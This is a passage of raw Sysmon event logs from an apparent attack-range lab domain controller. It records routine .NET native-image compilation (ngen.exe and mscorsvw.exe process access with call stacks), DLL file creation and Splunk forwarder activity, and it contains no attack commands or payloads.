21:06:15.234{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A247-60D3-B904-00000000CF01}7040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021931Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:15.156{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A247-60D3-B804-00000000CF01}1336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021930Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:15.140{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A247-60D3-B804-00000000CF01}1336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021929Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:15.140{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A247-60D3-B804-00000000CF01}1336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000021928Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:14.999{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D71EE46C9200674C7782859B76B05E61,SHA256=F0FB18FAA36E30A4AE3C13046175073FA8DF1C6BF5E0CCE42685149B0914617D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021952Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:16.890{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A248-60D3-BD04-00000000CF01}2612C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000021951Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:15.195{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61449-false10.0.1.12-8000- 10341000x800000000000000021950Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:16.874{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A248-60D3-BD04-00000000CF01}2612C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021949Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:16.874{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A248-60D3-BD04-00000000CF01}2612C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021948Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:16.796{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A248-60D3-BC04-00000000CF01}5756C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021947Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:16.781{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A248-60D3-BC04-00000000CF01}5756C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021946Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:16.781{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A248-60D3-BC04-00000000CF01}5756C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000021945Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:16.781{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8518281798203EF0CD3ACBCC9596104F,SHA256=D12318462200FCF8305091669EE3F414BEC69842B11E1D3BDB4B79C39177FF79,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000021944Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:16.703{4DB9351A-A248-60D3-BB04-00000000CF01}3576C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\df8-0\System.ServiceModel.Channels.dll2021-06-23 21:06:16.703 10341000x800000000000000021943Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:16.406{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A248-60D3-BB04-00000000CF01}3576C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021942Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:16.390{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A248-60D3-BB04-00000000CF01}3576C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021941Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:16.390{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A248-60D3-BB04-00000000CF01}3576C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021940Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:16.281{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A248-60D3-BA04-00000000CF01}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021939Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:16.265{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A248-60D3-BA04-00000000CF01}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021938Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:16.265{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A248-60D3-BA04-00000000CF01}3256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000021937Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:16.187{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3531116C393A4A92AE9ACAD057C24018,SHA256=5C5ADF634F5E050A00C56D142F4F62B8358E49B9FF64676A75DE8453457FC16C,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000021936Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:16.156{4DB9351A-A247-60D3-B904-00000000CF01}7040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1b80-0\System.ServiceModel.Activities.dll2021-06-23 21:06:16.156 10341000x800000000000000021965Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:17.984{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A249-60D3-C004-00000000CF01}5624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021964Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:17.953{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A249-60D3-C004-00000000CF01}5624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021963Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:17.953{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A249-60D3-C004-00000000CF01}5624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021962Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:06:17.874{4DB9351A-A249-60D3-BF04-00000000CF01}5560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\15b8-0\System.ServiceModel.Internals.dll2021-06-23 21:06:17.874 23542300x800000000000000021961Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:17.796{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09182527E7B1866448CF3B279C7476A7,SHA256=F50543197696C76871BA208A57FE1F26E7A0AD2CD204FC462B20071261CBE655,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021960Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:17.531{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A249-60D3-BF04-00000000CF01}5560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C: